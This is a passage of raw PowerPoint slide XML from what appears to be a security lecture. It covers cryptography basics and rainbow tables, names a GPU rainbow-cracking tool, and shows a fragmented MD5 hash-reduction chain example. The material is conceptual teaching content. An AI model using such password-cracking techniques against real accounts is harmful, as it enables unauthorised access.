            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public-key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The biggest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>-bit number: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>340,282,366,920,938,463,463,374,607,431,768,211,455 which equals to 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> − 1</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124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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rot="2220264">
            <a:off x="7058482" y="1985322"/>
            <a:ext cx="1028700" cy="2276475"/>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53316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Symmetric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encryption</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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="http://i.msdn.microsoft.com/dynimg/IC168364.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24000"/>
            <a:ext cx="8430241" cy="4417680"/>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72932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Rainbow Tables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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1066801"/>
            <a:ext cx="8534400" cy="4981364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="282575" lvl="0" indent="-282575" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Precomputed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>table for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>reversing cryptographic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="282575" lvl="0" indent="-282575" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="282575" lvl="0" indent="-282575" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Recovering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>the plaintext password, up to a certain length consisting of a limited set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="282575" lvl="0" indent="-282575" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Cryptohaze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>GPU Rainbow Cracker -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF66">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cryptohaze.com/gpurainbowcracker.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCFF66">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>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0422" y="5481513"/>
            <a:ext cx="2300178" cy="1300287"/>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59584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Rainbow Tables works?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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="923670"/>
            <a:ext cx="8534400" cy="4458144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="282575" lvl="0" indent="-282575" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Rainbow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>tables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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1234567)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&gt; fcea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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920</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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749</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> Reduction(fcea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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920</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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749</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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9274124</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> -&gt; Md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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9274124</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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7-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&gt; Reduction(d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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2234567</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
